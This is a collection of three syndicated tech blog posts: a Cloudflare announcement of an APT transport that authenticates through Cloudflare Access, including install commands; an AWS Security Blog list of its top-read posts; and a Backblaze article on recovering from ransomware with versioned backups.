By protecting your APT repository with Cloudflare Access, you can support authenticating users via Single-Sign On (SSO) providers, defining comprehensive access-control policies, and monitoring access and change logs.

Our APT transport leverages another Open Source tool we provide, cloudflared, which enables users to connect to your Cloudflare-protected domain securely.

Securing your APT Repository

To use our APT transport, you’ll need an APT repository that’s protected by Cloudflare Access. Our instructions (below) for using our transport will use apt.example.com as a hostname.

To use our APT transport with your own web-based APT repository, refer to our Setting Up Access guide.

APT Transport Installation

To install from source, both tools require Go – once you install Go, you can install `cloudflared` and our APT transport with four commands:

go get github.com/cloudflare/cloudflared/cmd/cloudflared
sudo cp ${GOPATH:-~/go}/bin/cloudflared /usr/local/bin/cloudflared
go get github.com/cloudflare/apt-transport-cloudflared/cmd/cfd
sudo cp ${GOPATH:-~/go}/bin/cfd /usr/lib/apt/methods/cfd

The above commands should place the cloudflared executable in /usr/local/bin (which should be on your PATH), and the APT transport binary in the required /usr/lib/apt/methods directory.

To confirm cloudflared is on your path, run:

which cloudflared

The above command should return /usr/local/bin/cloudflared

Now that the custom transport is installed, to start using it simply configure an APT source with the cfd:// rather than https:// e.g:

$ cat /etc/apt/sources.list.d/example.list 
deb [arch=amd64] cfd://apt.example.com/v2/stretch stable common

Next time you do `apt-get update` and `apt-get install`, a browser window will open asking you to log-in over Cloudflare Access, and your package will be retrieved using the token returned by `cloudflared`.

Fetching a GPG Key over Access

Usually, private APT repositories will use SecureApt and have their own GPG public key that users must install to verify the integrity of data retrieved from that repository.

Users can also leverage cloudflared for securely downloading and installing those keys, e.g:

cloudflared access login https://apt.example.com
cloudflared access curl https://apt.example.com/public.gpg | sudo apt-key add -

The first command will open your web browser allowing you to authenticate for your domain. The second command wraps curl to download the GPG key, and hands it off to `apt-key add`.

Cloudflare Access on “headless” servers

If you’re looking to deploy APT repositories protected by Cloudflare Access to non-user-facing machines (a.k.a. “headless” servers), opening a browser does not work. The good news is since February, Cloudflare Access supports service tokens – and we’ve built support for them into our APT transport from day one.

If you’d like to use service tokens with our APT transport, it’s as simple as placing the token in a file in the correct path; because the machine already has a token, there is also no dependency on `cloudflared` for authentication. You can find details on how to set-up a service token in the APT transport README.

What’s next?

As demonstrated, you can get started using our APT transport today – we’d love to hear your feedback on this!

This work came out of an internal dogfooding effort, and we’re currently experimenting with additional packaging formats and tooling. If you’re interested in seeing support for another format or tool, please reach out.

Top 10 Security Blog posts in 2019 so far

Post Syndicated from Tom Olsen original https://aws.amazon.com/blogs/security/top-10-security-blog-posts-in-2019-so-far/

Twice a year, we like to share what’s been popular to let you know what everyone’s reading and so you don’t miss something interesting.

One of the top posts so far this year has been the registration announcement for the re:Inforce conference that happened last week. We hope you attended or watched the keynote live stream. Because the conference is now over, we omitted this from the list.

As always, let us know what you want to read about in the Comments section below – we read them all and appreciate the feedback.

The top 10 posts from 2019 based on page views

  1. How to automate SAML federation to multiple AWS accounts from Microsoft Azure Active Directory
  2. How to centralize and automate IAM policy creation in sandbox, development, and test environments
  3. AWS awarded PROTECTED certification in Australia
  4. Setting permissions to enable accounts for upcoming AWS Regions
  5. How to use service control policies to set permission guardrails across accounts in your AWS Organization
  6. Alerting, monitoring, and reporting for PCI-DSS awareness with Amazon Elasticsearch Service and AWS Lambda
  7. Updated whitepaper now available: Aligning to the NIST Cybersecurity Framework in the AWS Cloud
  8. How to visualize Amazon GuardDuty findings: serverless edition
  9. Guidelines for protecting your AWS account while using programmatic access
  10. How to quickly find and update your access keys, password, and MFA setting using the AWS Management Console

If you’re new to AWS and are just discovering the Security Blog, we’ve also compiled a list of older posts that customers continue to find useful.

The top 10 posts of all time based on page views

  1. Where’s My Secret Access Key?
  2. Writing IAM Policies: How to Grant Access to an Amazon S3 Bucket
  3. How to Restrict Amazon S3 Bucket Access to a Specific IAM Role
  4. Securely Connect to Linux Instances Running in a Private Amazon VPC
  5. Writing IAM Policies: Grant Access to User-Specific Folders in an Amazon S3 Bucket
  6. Setting the Record Straight on Bloomberg BusinessWeek’s Erroneous Article
  7. How to Connect Your On-Premises Active Directory to AWS Using AD Connector
  8. IAM Policies and Bucket Policies and ACLs! Oh, My! (Controlling Access to S3 Resources)
  9. A New and Standardized Way to Manage Credentials in the AWS SDKs
  10. How to Control Access to Your Amazon Elasticsearch Service Domain

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Tom Olsen

Tom shares responsibility for the AWS Security Blog with Becca Crockett. If you’ve got feedback about the blog, he wants to hear it in the Comments here or in any post. In his free time, you’ll either find him hanging out with his wife and their frog, in his woodshop, or skateboarding.

author photo

Becca Crockett

Becca co-manages the Security Blog with Tom Olsen. She enjoys guiding first-time blog contributors through the writing process, and she likes to interview people. In her free time, she drinks a lot of coffee and reads things. At work, she also drinks a lot of coffee and reads things.

When Ransomware Strikes

Post Syndicated from Natasha Rabinov original https://www.backblaze.com/blog/how-to-deal-with-ransomware/

Ransomware Prevention & Survival

Does this sound familiar? An employee walks over with panic and confusion written all over their face. They approach holding their laptop and say that they’re not sure what happened. You open their computer to find that there is a single message displayed:

You want your files?
Your computer has been infected with ransomware and you will need to pay us to get them back.

They may not know what just happened, but the sinking feeling in your stomach has a name you know well. Your company has been hit with ransomware, which is, unfortunately, a growing trend. The business of ransomware is a booming one, bringing productivity and growth to a dead stop.

As ransomware attacks increase on businesses of all sizes, ransomware may prove to be the single biggest destructive force for business data, surpassing even hard drive failures as the leader of data loss.

When Ransomware Strikes

It’s a situation that most IT Managers will face at some point in their career. Per Security Magazine, “Eighty-six percent Small to Medium Business (SMB) clients were recently victimized by ransomware.” In fact, it happened to us at Backblaze. Cybersecurity company Ice Cybersecurity published that ransomware attacks occur every 40 seconds (that’s over 2,000 times per day!). Coveware’s Ransomware Marketplace Report says that the average ransom cost has increased by 89% to $12,762, as compared to $6,733 in Q4 of 2018. The downtime resulting from ransomware is also on the rise. The average number of days a ransomware incident lasts amounts to just over a week at 7.3 days, which should be factored in when calculating the true cost of ransomware. The estimated downtime costs per ransomware attack per company averaged $65,645. The increasing financial impact on businesses of all sizes has proven that the business of ransomware is booming, with no signs of slowing down.

How Has Ransomware Grown So Quickly?

Ransomware has taken advantage of multiple developments in technology, similar to other high-growth industries. The first attacks occurred in 1989 with floppy desks distributed across organizations, purporting to raise money to fund AIDS research. At the time, the users were asked to pay $189 to get their files back.

Since then, ransomware has grown significantly due to the advent of multiple facilitators. Sophisticated RSA encryption with increasing key sizes make encrypted files more difficult to decrypt. Per the Carbon Black report, ransomware kits are now relatively easy to access on the dark web and only cost $10, on average. With cryptocurrency in place, payment is both virtually untraceable and irreversible. As recovery becomes more difficult, the cost to business rises alongside it. Per the Atlantic, ransomware now costs businesses more than $75 billion per year.

If Your Job is Protecting Company Data, What Happens After Your Ransomware Attack?

Isolate, Assess, Restore

Your first thought will probably be that you need to isolate any infected computers and get them off the network. Next, you may begin to assess the damage by determining the origins of the infected file and locating others that were affected. You can check our guide for recovering from ransomware or call in a specialized team to assist you. Once you prevent the malware from spreading, your thoughts will surely turn to the backup strategy you have in place. If you have used either a backup or sync solution to get your data offsite, you are more prepared than most. Unfortunately, even for this Eagle Scout level of preparedness, too often the backup solution hasn’t been tested against the exact scenario it’s needed for.

Both backup and sync solutions help get your data offsite. However, sync solutions vary greatly in their process for backup. Some require saving data to a specific folder. Others provide versions of files. Most offer varying pricing tiers for storage space. Backup solutions also have a multitude of features, some of which prove vital at the time of restore.

If you are in IT, you are constantly looking for points of failure. When it comes time to restore your data after a ransomware attack, three weak points immediately come to mind:

1. Your Security Breach Has Affected Your Backups

Redundancy is key in workflows. However, if you are syncing your data and get hit with ransomware on your local machine, your newly infected files will automatically sync to the cloud and thereby, infect your backup set.

This can be mitigated with backup software that offers multiple versions of your files. Backup software, such as Backblaze Business Backup, saves your original file as is and creates a new backup file with every change made. If you accidentally delete a file or if your files are encrypted by ransomware and you are backed up with Backblaze Business Backup, you can simply restore a prior version of a file — one that has not been encrypted by the ransomware. The capability of your backup software to restore a prior version is the difference between usable and unusable data.

2. Restoring Data will be Cumbersome and Time-Consuming

Depending on the size of your dataset, restoring from the cloud can be a drawn out process. Moreover, for those that need to restore gigabytes of data, the restore process may not only prove to be lengthy, but also tedious.

Snapshots allow you to restore all of your data from a specific point in time. When dealing with ransomware, this capability is crucial. Without this functionality, each file needs to be rolled back individually to a prior version and downloaded one at a time. At Backblaze, you can easily create a snapshot of your data and archive those snapshots into cloud storage to give you the appropriate amount of time to recover.

You can download the files that your employees need immediately and request the rest of their data to be shipped to you overnight on a USB drive. You can then either keep the drive or send it back for a full refund.

3. All Critical Data Didn’t Get Backed Up

Unfortunately, human error is the second leading cause of data loss. As humans, we all make mistakes and some of those may have a large impact on company data. Although there is no way to prevent employees from spilling drinks on computers or leaving laptops on planes, others are easier to avoid. Some solutions require users to save their data to a specific folder to enable backups. When thinking about the files on your average employees’ desktops, are there any that may prove critical to your business? If so, they need to be backed up. Relying on those employees to change their work habits and begin saving files to specific, backed-up locations is certainly not the easiest nor reliable method of data protection.

In fact, it is the responsibility of the backup solution to protect business data, regardless of where the end user saves it. To that end, Backblaze backs up all user-generated data by default. The most effective backup solutions are ones that are easiest for the end users and require the least amount of user intervention.

Are you interested in assessing the risk to your business? Would you like to learn how to protect your business from ransomware? To better understand innovative ways that you can protect business data, we invite you to attend our Ransomware: Prevention and Survival webinar on July 17th. Join Steven Rahseparian, Chief Technical Officer at Ice CyberSecurity and industry expert on cybersecurity, to hear stories of ransomware and to learn how to take a proactive approach to protect your business data.

The post When Ransomware Strikes appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.